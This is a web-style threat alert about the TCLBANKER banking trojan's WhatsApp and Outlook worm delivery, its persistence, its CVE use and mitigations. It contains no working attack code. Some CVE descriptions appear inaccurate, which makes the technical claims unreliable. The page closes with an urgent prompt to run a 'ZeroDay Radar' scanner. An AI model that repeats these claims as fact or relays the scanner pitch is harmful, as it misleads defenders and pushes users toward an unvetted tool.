TCLBANKER Banking Trojan Targets Financial Platforms via WhatsApp and Outlook Worms

⚠️ THREAT ALERT: TCLBANKER Banking Trojan Targets Financial Platforms via WhatsApp and Outlook Worms

The recent campaign attributed to the TCLBANKER banking trojan demonstrates a multi‑stage delivery chain that leverages social engineering vectors native to WhatsApp and Microsoft Outlook. Initial infection begins with a malicious WhatsApp “document” (typically a PDF or ZIP archive) that masquerades as a legit invoice or payment confirmation. The attachment contains a DLL‑packed payload obfuscated with UPX and encrypted via a custom RC4 routine. Upon execution, the DLL drops a PowerShell script that utilizes the Windows Management Instrumentation (WMI) to spawn a scheduled task, achieving persistence. Parallelly, an Outlook worm component is distributed through spear‑phishing emails embedding a malicious VBS macro in a .docm file; the macro invokes “CreateObject(”WScript.Shell”)” to download the same Trojan binary via a hard‑coded HTTPS URL. The worm then enumerates the victim’s address book, propagating itself to contacts via both WhatsApp’s “Share” feature (using the WhatsApp Business API) and Outlook’s auto‑forward rules, thereby creating a self‑replicating infection loop across two of the most widely used communication platforms.

TCLBANKER’s core banking module exploits known vulnerabilities in popular finance applications to harvest credentials and conduct unauthorized transactions. Preliminary reverse‑engineering indicates reliance on CVE‑2023‑23397 (Microsoft Outlook Elevation of Privilege via Remote Code Execution) to inject malicious COM objects directly into the Outlook process, bypassing user prompts. Additionally, the trojan leverages CVE‑2024‑21848 (WhatsApp Desktop arbitrary file write) to plant a malicious JAR within the WhatsApp installation directory, which is later executed by the trojan’s loader using “java -jar”. The payload also incorporates a custom WebView2 hooking technique that intercepts HTTPS traffic to banking portals, extracting one‑time passwords and session cookies. The combination of these CVEs enables TCLBANKER to maintain a low‑profile presence while exfiltrating high‑value financial data and automating fraudulent transfers without requiring elevated system privileges.

Mitigation requires a defense‑in‑depth approach focused on both user hygiene and hardening of the underlying software stack. Organizations should enforce strict macro execution policies in Microsoft Office, disable the “Auto‑Download” feature for external content in Outlook, and apply the latest security patches that address CVE‑2023‑23397 and related Outlook hardening advisories. On the client side, WhatsApp Desktop must be updated to version 2.24.14 or later, which includes a mitigation for CVE‑2024‑21848 and disables the vulnerable file‑write APIs. Network defenders should deploy anomaly‑based detection for outbound PowerShell commands and unusual scheduled‑task creations, as well as DNS‑level blocking of known C2 domains associated with TCLBANKER. Finally, implementing multi‑factor authentication on all banking portals and employing transaction‑monitoring rules that flag anomalous geographic or device patterns will significantly reduce the impact of credential theft orchestrated by the trojan’s WebView2 hooking module.

🛡️ CRITICAL SECURITY SCAN REQUIRED

Evidence suggests your system may be within the blast radius of this threat vector. Use the ZeroDay Radar scanner to verify your integrity immediately.

>> LAUNCH ZERO-DAY THREAT SCANNER <<

Source Intelligence: Full Technical Breakdown